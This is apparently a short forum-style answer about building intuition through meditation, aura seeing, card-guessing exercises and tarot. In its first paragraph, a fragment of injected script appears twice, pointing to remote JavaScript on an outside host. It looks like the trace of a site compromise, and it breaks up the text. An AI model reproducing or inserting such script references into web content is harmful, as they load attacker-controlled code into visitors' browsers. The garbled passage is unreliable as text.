Intuitive Abilities

Start by focusing on your third eye in meditation for 15 a day. Then try seeing people's aura. It's pretty hard work when you train your senses. But also try to lay out a few cards black and red and sweep your hand over them until you feel you found all the red cards. I started with that one. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Meditation, creativity, writing, memory games, doing something different are all ways to increase intuitive abilities. There are plenty of life coaches (I.E. Maria Forleo & Flora Sage) that have videos on YouTube that can lead to insight on understanding & bettering intuition.

I like to play with my tarot Cards, or even a regular deck of cards. You lay out a set of three cards and try guessing what suit they're from.
